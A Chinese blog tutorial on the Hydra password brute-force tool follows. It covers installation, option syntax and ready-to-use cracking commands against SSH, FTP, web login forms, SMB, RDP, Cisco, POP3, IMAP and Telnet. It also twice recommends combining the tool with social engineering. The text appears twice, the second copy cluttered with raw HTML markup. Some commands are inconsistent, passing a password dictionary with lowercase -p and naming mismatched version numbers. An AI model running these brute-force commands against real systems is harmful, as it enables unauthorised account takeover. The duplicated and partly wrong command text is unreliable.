Linux下的暴力密码在线破解工具Hydra详解
这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型***来说,有时能够得到事半功倍的效果。本文仅从安全角度去探讨测试,使用本文内容去做破坏者,与本人无关。
一、简介
hydra是著名***组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。官网:http://www.thc.org/thc-hydra
可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。
二、安装
如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra
Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包:yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
hydra下载地址:http://www.thc.org/releases/hydra-7.3.tar.gz# tar zxvf hydra-7.0-src.tar.gz
# cd hydra-7.0-src
# ./configure
# make
# make installhydra支持GUI图形界面,不过习惯还是命令好用。
三、参数说明
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项
四、各种用法实例
简单演示:
破解成功,直接显示结果,上图画红线的地方就是破解出来的密码,也可以通过参数-o输出到文件里。如果字典够强大,结合社工,密码不用很久就出来。
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示。)</span></div> <div><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;">5、破解https:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>6、破解teamspeak:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>7、破解cisco:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -P pass.txt 10.36.16.18 cisco<br>hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>8、破解smb:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -l administrator -P pass.txt 10.36.16.18 smb<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>9、破解pop3:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -l muts -P pass.txt my.pop3.mail pop3<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>10、破解rdp:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra ip rdp -l administrator -P pass.txt -V<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>11、破解http-proxy:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -l admin -P pass.txt http-proxy://10.36.16.18<br></span><span style="font-family:Georgia;color:rgb(0,34,0);font-size:12px;"><br>12、破解imap:<br></span><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br>hydra -L user.txt -p secret 10.36.16.18 imap PLAIN<br>hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</span></div> <div><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br></span></div> <div><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"></span></div> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;">一、简介</strong></span></div> <div style="margin:10px auto;padding:0px;"><a href="http://images.cnitblog.com/blog/370046/201212/31170927-6bc0a6050b184d01adbe6480de388e88.png" style="margin:0px;padding:0px;text-decoration:none;color:rgb(0,0,0);border-bottom-width:1px;border-bottom-style:dotted;border-bottom-color:rgb(51,51,51);" target="_blank"><img title="hydra" src="https://yqfile.alicdn.com/img_a13854c6f5d2cfa2dd1d3aea20432f26.png" alt="hydra" width="232" height="232" align="right" border="0" style="margin:0px 0px 0px 10px;padding:0px;border:0px;float:right;background-image:none;"></a></div> <div style="margin:10px auto;padding:0px;"><span style="color:rgb(255,0,0);">Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.</span></div> <div style="margin:10px auto;padding:0px;"><span style="color:rgb(255,0,0);">Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.</span></div> <div style="margin:10px auto;padding:0px;">Currently this tool supports: <br style="margin:0px;padding:0px;">AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.</div> <div style="margin:10px auto;padding:0px;">For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.</div> <div style="margin:10px auto;padding:0px;">This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.</div> <div style="margin:10px auto;padding:0px;">The program is maintained by van Hauser and David Maciejak.</div> <div style="margin:10px auto;padding:0px;">The Hackers Choice <br style="margin:0px;padding:0px;"><a href="http://www.thc.org/thc-hydra" style="margin:0px;padding:0px;text-decoration:none;color:rgb(0,0,0);border-bottom-width:1px;border-bottom-style:dotted;border-bottom-color:rgb(51,51,51);" target="_blank">http://www.thc.org/thc-hydra</a></div> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;"><br></strong></span></div> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;">二、安装</strong></span></div> <div style="margin:10px auto;padding:0px;">1、安装相关依赖包</div> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>Ubuntu/Debian</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';">apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra</pre> <div style="margin:10px auto;padding:0px;"> Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装。</div> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>Redhat/Fedora</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';">yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>OpenSuSE</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';">zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel</pre> <div style="margin:10px auto;padding:0px;">本实验用的是 CentOS release 5.6 (Final),执行yum install 后相关依赖包安装情况如下:</div> <div style="margin:10px auto;padding:0px;"><img src="https://ucc.alicdn.com/vvwmwg766i5hu/developer-article608406/20241020/81a52a80d104465e81ac721320bf3256.jpeg" alt="" width="900" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_7a824dca6bd7120e1f64f9edbd69d4a9.jpeg" alt="" width="900" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;">2、Hydra 安装</div> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># wget http://www.thc.org/releases/hydra-7.4.1.tar.gz # tar zxvf hydra-7.4.1.tar.gz # cd hydra-7.4.1 # ./configure # make && make install</pre> <div style="margin:10px auto;padding:0px;"># ./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。</div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_ff120f8a9cc55499ec9c89117e227fdc.jpeg" alt="" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;"># make</div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_3a8dc52347d0c529ecbaa3a66729f6db.jpeg" alt="" width="900" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;"># make install</div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_ae6c78692da0b8c8ef8275bb1bef3694.jpeg" alt="" width="900" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;">三、Syntax</strong></span></div> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]</pre> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-R</strong><br style="margin:0px;padding:0px;">继续从上一次进度接着破解</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-S</strong><br style="margin:0px;padding:0px;">大写,采用SSL链接</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-s <PORT></strong><br style="margin:0px;padding:0px;">小写,可通过这个参数指定非默认端口</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-l <LOGIN></strong><br style="margin:0px;padding:0px;">指定破解的用户,对特定用户破解</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-L <FILE></strong><br style="margin:0px;padding:0px;">指定用户名字典</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-p <PASS></strong><br style="margin:0px;padding:0px;">小写,指定密码破解,少用,一般是采用密码字典</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-P <FILE></strong><br style="margin:0px;padding:0px;">大写,指定密码字典</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-e <ns></strong><br style="margin:0px;padding:0px;">可选选项,n:空密码试探,s:使用指定用户和密码试探</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-C <FILE></strong><br style="margin:0px;padding:0px;">使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-M <FILE></strong><br style="margin:0px;padding:0px;">指定目标列表文件一行一条</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-o <FILE></strong><br style="margin:0px;padding:0px;">指定结果输出文件</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-f</strong><br style="margin:0px;padding:0px;">在使用-M参数以后,找到第一对登录名或者密码的时候中止破解</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-t <TASKS></strong><br style="margin:0px;padding:0px;">同时运行的线程数,默认为16</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-w <TIME></strong><br style="margin:0px;padding:0px;">设置最大超时的时间,单位秒,默认是30s</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">-v / -V</strong><br style="margin:0px;padding:0px;">显示详细过程</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">server</strong><br style="margin:0px;padding:0px;">目标ip</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">service</strong><br style="margin:0px;padding:0px;">指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等</div> <div style="margin:10px auto 10px 30px;padding:0px;"><strong style="margin:0px;padding:0px;">OPT</strong><br style="margin:0px;padding:0px;">可选项</div> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;">四、实例</strong></span></div> <div style="margin:10px auto;padding:0px;">1、手动创建用户名字典和密码字典,这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。 </div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_3ed96b25d6d8c45c103f10e5b16415ca.jpeg" alt="" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;">2、破解ssh:</div> <div style="margin:10px auto;padding:0px;"># hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh</div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_4f35e8ce61ab39d9f02a6b0cb3d12490.jpeg" alt="" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;">破解成功,直接显示结果。</div> <div style="margin:10px auto;padding:0px;">也可以使用 -o 选项指定结果输出文件。</div> <div style="margin:10px auto;padding:0px;"># hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh</div> <div style="margin:10px auto;padding:0px;"><img src="https://yqfile.alicdn.com/img_9e16f6a06e3f5a4302eb84828349911d.jpeg" alt="" width="900" style="margin:0px;padding:0px;border:0px;"></div> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;">五、其他类型密码破解</strong></span></div> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解ftp:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV # hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>get方式提交,破解web登录:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"> # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>post方式提交,破解web登录:</div></li> </ul> <div style="margin:10px auto;padding:0px;"> 该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:</div> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"><form action="index.php" method="POST"> <input type="text" name="name" /><BR><br> <input type="password" name="pwd" /><br><br> <input type="submit" name="sub" value="提交"> </form></pre> <div style="margin:10px auto;padding:0px;"> 假设有以上一个密码登录表单,我们执行命令:</div> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido”
说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。
后面参数是网页中对应的表单字段的name 属性,后面中的内容是表示错误猜解的返回信息提示,可以自定义。</div> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解https:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解teamspeak:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解cisco:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -P pass.txt 10.36.16.18 cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解smb:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -l administrator -P pass.txt 10.36.16.18 smb</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解pop3:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -l muts -P pass.txt my.pop3.mail pop3</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解rdp:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra ip rdp -l administrator -P pass.txt -V</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解http-proxy:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -l admin -P pass.txt http-proxy://10.36.16.18</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解imap:</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra -L user.txt -p secret 10.36.16.18 imap PLAIN # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</pre> <ul style="margin-left:30px;padding:0px;" class="list-paddingleft-2"> <li><div>破解telnet</div></li> </ul> <pre style="margin-top:0px;margin-bottom:0px;padding:0px;white-space:pre-wrap;font-family:'Courier New';"># hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V</pre> <div style="margin:10px auto;padding:0px;"><span style="margin:0px;padding:0px;line-height:1.8;color:rgb(128,0,0);font-size:16px;"><strong style="margin:0px;padding:0px;">六、总结</strong></span></div> <div style="margin:10px auto;padding:0px;">此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型***来说,有时能够得到事半功倍的效果。</div> <div>分类: <a href="http://www.cnblogs.com/mchina/category/381459.html" style="margin:0px;padding:0px;text-decoration:none;color:rgb(0,0,0);border-bottom-width:1px;border-bottom-style:dotted;border-bottom-color:rgb(51,51,51);" target="_blank">Linux</a></div> <div><span style="font-family:monospace;color:rgb(0,34,0);font-size:9px;background:rgb(255,255,255);"><br></span><br></div> <div><span style="font-family:Calibri;font-size:14px;"> </span></div> <div><br></div> </div>